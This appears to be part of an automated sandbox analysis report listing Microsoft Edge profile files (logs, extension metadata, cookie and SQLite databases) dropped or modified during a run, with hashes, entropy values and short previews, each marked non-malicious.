C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.134685340933632
Encrypted:	false
SSDEEP:	6:BEq+cpQL+q2P923oH+Tcwt8aPrqIFUt8UEiSG1Zmw+UELQLVkwO923oH+Tcwt8a4:BW+v4YebL3FUt8UT11/+U1V5LYebQJ
MD5:	86803E897B91C4FF49CEDC7C851B39DB
SHA1:	61A196DB241B3287BD2BB50B5A5FC2161AAFE87E
SHA-256:	949BD9BAD0D260DFEFE4C62571EDFF5E006E227713D210F400706C599FE1FA33
SHA-512:	F173BDDEF44C2326E2C5C52631BBA5C10173327D30227FAA8EBF50DB773D2E84AF5B7045BB99BCC5E928A009DB6613422B0070E81ABF5D0BC9E0556143A9A826
Malicious:	false
Preview:	2024/12/27-01:10:31.304 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-01:10:31.334 a9c Recovering log #3.2024/12/27-01:10:31.354 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.121516639169753
Encrypted:	false
SSDEEP:	6:BEIS3AQL+q2P923oH+Tcwt865IFUt8UEZNG1Zmw+UEZ9AQLVkwO923oH+Tcwt86L:BC39+v4Yeb/WFUt8UgU1/+Ui9V5LYebD
MD5:	002B16CADD5B089E5DF0BB9C47A6BF3D
SHA1:	F55B6C532768C4423AB695FF0265927B524B87DD
SHA-256:	7312B3A8CFE7E2214A011F28820D903C4D96EA79D7DBC63FDF1C7A95CA24F66D
SHA-512:	8BA21A8832478CA953D59DA5C0D1794F6A3B02A397C21E7A578132BA893C2D556433C90A7F760B4C9AE14BFAEF629EEA277A22BB4F391339FE46AE5E5045A4EC
Malicious:	false
Preview:	2024/12/27-01:10:31.421 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:10:31.422 a9c Recovering log #3.2024/12/27-01:10:31.423 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.121516639169753
Encrypted:	false
SSDEEP:	6:BEIS3AQL+q2P923oH+Tcwt865IFUt8UEZNG1Zmw+UEZ9AQLVkwO923oH+Tcwt86L:BC39+v4Yeb/WFUt8UgU1/+Ui9V5LYebD
MD5:	002B16CADD5B089E5DF0BB9C47A6BF3D
SHA1:	F55B6C532768C4423AB695FF0265927B524B87DD
SHA-256:	7312B3A8CFE7E2214A011F28820D903C4D96EA79D7DBC63FDF1C7A95CA24F66D
SHA-512:	8BA21A8832478CA953D59DA5C0D1794F6A3B02A397C21E7A578132BA893C2D556433C90A7F760B4C9AE14BFAEF629EEA277A22BB4F391339FE46AE5E5045A4EC
Malicious:	false
Preview:	2024/12/27-01:10:31.421 a9c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:10:31.422 a9c Recovering log #3.2024/12/27-01:10:31.423 a9c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.176490758145237
Encrypted:	false
SSDEEP:	6:BEXRMM+q2P923oH+Tcwt8NIFUt8UEXRZZmw+UE9MVkwO923oH+Tcwt8+eLJ:BeRMM+v4YebpFUt8UeRZ/+U0MV5LYeb2
MD5:	A256E78C8C5078ECA5A473DD3C725C12
SHA1:	6ADCC8C8220E5CC8E147E893FE1E9B3A387B8C12
SHA-256:	F525830DD2A62857D9AC55D5F4180F1F8DB715CD50B8BB33742FEAE12D6DD8EF
SHA-512:	9E0FD9AC524C4BE6BB7275B10B26831D9D0C997DB1C0B88FCB034813AC2D852346E8E26E97618B4BFB49F16C4F7A56C7E64FFCFAF6AAF1AEF9AAD8EE0C368AE8
Malicious:	false
Preview:	2024/12/27-01:10:31.895 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:10:31.895 106c Recovering log #3.2024/12/27-01:10:31.896 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.176490758145237
Encrypted:	false
SSDEEP:	6:BEXRMM+q2P923oH+Tcwt8NIFUt8UEXRZZmw+UE9MVkwO923oH+Tcwt8+eLJ:BeRMM+v4YebpFUt8UeRZ/+U0MV5LYeb2
MD5:	A256E78C8C5078ECA5A473DD3C725C12
SHA1:	6ADCC8C8220E5CC8E147E893FE1E9B3A387B8C12
SHA-256:	F525830DD2A62857D9AC55D5F4180F1F8DB715CD50B8BB33742FEAE12D6DD8EF
SHA-512:	9E0FD9AC524C4BE6BB7275B10B26831D9D0C997DB1C0B88FCB034813AC2D852346E8E26E97618B4BFB49F16C4F7A56C7E64FFCFAF6AAF1AEF9AAD8EE0C368AE8
Malicious:	false
Preview:	2024/12/27-01:10:31.895 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:10:31.895 106c Recovering log #3.2024/12/27-01:10:31.896 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6481260415575596
Encrypted:	false
SSDEEP:	384:aj9P012QkQerkjlxP/KbtLcg773pL9hCgam6ItRKToaAu:adPe2mlxP/Ng7Pv9RKcC
MD5:	8D3B8E3A72C40BAD6B53D27E09419923
SHA1:	561B9DDED7215DE5C2D7E4FDB64D5EB8A010A62C
SHA-256:	4C7F428D712485570F5840B0FA241809A64B9AF4D3BB4055663DAED3F371F09C
SHA-512:	B77E85B650C227FBAE00CBCBF0C87D6C883ABEAA0255D740CDFA2EE41E2E6E5DEB971CF51649C3399815AC058F1B175C7BBF2FC3CEC983B6ACEF67C2323EB624
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.275436099747022
Encrypted:	false
SSDEEP:	12:BfM+v4Yeb8rcHEZrELFUt8UI6/+UaMMV5LYeb8rcHEZrEZSJ:r4Yeb8nZrExg8blLYeb8nZrEZe
MD5:	BAE7A5E2CC3EF364E384328EFE97867F
SHA1:	1F7B2D32E0B00214088310ECC3C5411ECDF63F53
SHA-256:	63CA0186ED3FA2169759969F29420EB84059195B67B5802E03A9CD2E307DFFE0
SHA-512:	C672B3046A2A08BCDA027BBA15F772606A55CD17DAB1651C5B14F1FF1AD2A14D37524484D44EC188F8C1736C689D1E23E5395242A883C59C8AD5EB95867631A8
Malicious:	false
Preview:	2024/12/27-01:10:35.833 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:10:35.834 106c Recovering log #3.2024/12/27-01:10:35.835 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.275436099747022
Encrypted:	false
SSDEEP:	12:BfM+v4Yeb8rcHEZrELFUt8UI6/+UaMMV5LYeb8rcHEZrEZSJ:r4Yeb8nZrExg8blLYeb8nZrEZe
MD5:	BAE7A5E2CC3EF364E384328EFE97867F
SHA1:	1F7B2D32E0B00214088310ECC3C5411ECDF63F53
SHA-256:	63CA0186ED3FA2169759969F29420EB84059195B67B5802E03A9CD2E307DFFE0
SHA-512:	C672B3046A2A08BCDA027BBA15F772606A55CD17DAB1651C5B14F1FF1AD2A14D37524484D44EC188F8C1736C689D1E23E5395242A883C59C8AD5EB95867631A8
Malicious:	false
Preview:	2024/12/27-01:10:35.833 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:10:35.834 106c Recovering log #3.2024/12/27-01:10:35.835 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1043
Entropy (8bit):	5.608782806367872
Encrypted:	false
SSDEEP:	24:vZW3jHclyVvXO+KXZG/WpV03y1x4ghaiMyG:vZwmyVvKXZzpV03Sx4kaByG
MD5:	082A547D649590A3E51DF0FFAF20BB64
SHA1:	A1CE38D033D870C8CB2094F0EF887004F47A8E73
SHA-256:	C2C16B89E9D6C7E8C4DE36E1DF4757BF5FC7CDAE5B990EAC03865D9D4D47DC11
SHA-512:	E2684FCAD83D11F3CE7FD8D308FDD1BA6C779BB2BB3891B2FB41691D9F263291E9E3144B95CA8AE157C0CA34028912096BD1CB8A078A95924BAB9ED93AEE7B41
Malicious:	false
Preview:	.Q...................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1735279846056.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735279847106.._https://ntp.msn.com..MUID!.2553C31DEE6B611F1DE5D67FEF6C6080.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735279846141,"schedule":[-1,-1,37,39,32,-1,-1],"scheduleFixed":[-1,-1,37,39,32,-1,-1],"simpleSchedule":[21,25,41,34,28,30,31]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735279846026.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Fri Dec 27 2024 01:10:45 GMT-0500 (Eastern Standa

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.112925188158659
Encrypted:	false
SSDEEP:	6:BE5KqM+q2P923oH+Tcwt8a2jMGIFUt8UEmZmw+UEvKqMVkwO923oH+Tcwt8a2jM4:BUM+v4Yeb8EFUt8U3/+U2MV5LYeb8bJ
MD5:	6E26037280BF968445D644873CA673C6
SHA1:	BD8692F1F19F8255FCD5269071E3067D921AE0A0
SHA-256:	7834B2304022D2C51758A717175C74561F8233A38E0DD5D3EF121F28D478EBA2
SHA-512:	81C4DDF4535006A02215CEC0CE30902A7439C977CAF5ED4F39D0EE6CB743545F4ECCD2F1B90F04F57499A821D9EB0A1BFAA318A223F019C2F98B2B95742F0689
Malicious:	false
Preview:	2024/12/27-01:10:31.500 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:10:31.502 a6c Recovering log #3.2024/12/27-01:10:31.506 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.112925188158659
Encrypted:	false
SSDEEP:	6:BE5KqM+q2P923oH+Tcwt8a2jMGIFUt8UEmZmw+UEvKqMVkwO923oH+Tcwt8a2jM4:BUM+v4Yeb8EFUt8U3/+U2MV5LYeb8bJ
MD5:	6E26037280BF968445D644873CA673C6
SHA1:	BD8692F1F19F8255FCD5269071E3067D921AE0A0
SHA-256:	7834B2304022D2C51758A717175C74561F8233A38E0DD5D3EF121F28D478EBA2
SHA-512:	81C4DDF4535006A02215CEC0CE30902A7439C977CAF5ED4F39D0EE6CB743545F4ECCD2F1B90F04F57499A821D9EB0A1BFAA318A223F019C2F98B2B95742F0689
Malicious:	false
Preview:	2024/12/27-01:10:31.500 a6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:10:31.502 a6c Recovering log #3.2024/12/27-01:10:31.506 a6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\174068ad-5cd2-4d62-a43c-603415d36123.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\410a2f69-33b7-40a2-971b-8640dde9a534.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\485c59f9-bb73-413b-a52c-c2100eb6848d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\55f08023-12de-4960-867d-5f05dee568a2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	modified
Size (bytes):	20480
Entropy (8bit):	2.780449155069391
Encrypted:	false
SSDEEP:	192:tTRblHlsrH86V7t0cIg8dS4vePgXcf0L/ZJVb:VRpHS86Vh0cIgCSgXI0LhJVb
MD5:	C70EF79074510D49988225044EF964CB
SHA1:	6B1BD5591303ACB47BFDFD6485A864C4B4E669DA
SHA-256:	508C5AA1796B20E507BF7D6BEA7105E8C10BA21371B3100585243A8E40638B4B
SHA-512:	ACBEA902F8D05BBEF753F6BBB329EFC6212C360BB5E81BCB84362A9046186EE47C8D4FD9D932B9F44B8AFB0354E8419621033B1054BB818F10E545EBC47CAAFF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.2140594253796737
Encrypted:	false
SSDEEP:	48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTIU:eIEumQv8m1ccnvS6DqAVHv
MD5:	0ACC2405705869C26E949983A56BA076
SHA1:	D50C8C1194F9950F4B56C2CEE020F85C473B8B50
SHA-256:	941ACF3DD2ECF1999C7F953D08BF08E6657EAE7F8136FB0A3314D350117273B5
SHA-512:	9A23A0C27A081510652EF97DDA01F4927D8671F7290E475B6824BDE9B0612F325E75D1A2F7D0C2B0E93343DDA9294F7C6DBAD5F3DE570C98CFA5123E191622F4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4a092.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4b85f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
